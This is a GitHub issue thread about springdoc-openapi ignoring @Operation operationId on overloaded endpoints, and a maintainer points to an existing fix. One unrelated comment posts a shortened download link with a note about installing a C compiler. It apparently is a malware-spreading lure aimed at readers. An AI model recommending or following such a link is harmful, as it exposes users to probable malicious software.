### ISSUE TITLE
[BUG] Swagger ignore Annotation Operation(operationId)

### ISSUE THREAD

**Issue by alverad-katsuro** [springdoc/springdoc-openapi#2716]
**Describe the bug**

I am using the "swagger-typescript-api" library to generate client, however I noticed that the @Operation annotation with the operationId parameter is being ignored for overloaded methods, they are grouped in the api-docs specification and only the last one is taken into account, in addition to adding a suffix.

**To Reproduce**

Create two GET endpoints with same path and add @Operation(operationId = '<unique-key>')

Code example: https://github.com/alverad-katsuro/example-swagger-bug.git based on: https://github.com/springdoc/springdoc-openapi/issues/675#issuecomment-668400125

**Expected behavior**

Two specifications in api-docs

![image](https://github.com/user-attachments/assets/c58c9d3f-58d2-4f89-9525-aa86c0278fb1)

**Screenshots**

![image](https://github.com/user-attachments/assets/ba344008-0a97-4c28-9944-8a448383999c)

**Additional context**
Spring Boot 3.3.3
Swagger 2.5.0

**Comment by Arturron** [comment]
download
https://bit.ly/4gwC82r

you may need to install the c compiler

**Comment by alverad-katsuro** [comment]
> download https://bit.ly/4gwC82r
> 
> you may need to install the c compiler

I already have installed

**Comment by bnasslahsen** [comment]
@alverad-katsuro,

From your project, first clean-up some useless dependencies
![image](https://github.com/user-attachments/assets/9e0f74a3-3ba5-4690-9f97-6b043bbd717c)

Then the issue you are mentioning is resolved by https://github.com/springdoc/springdoc-openapi/issues/2646

You can already test it based on the latest SNAPSHOT.
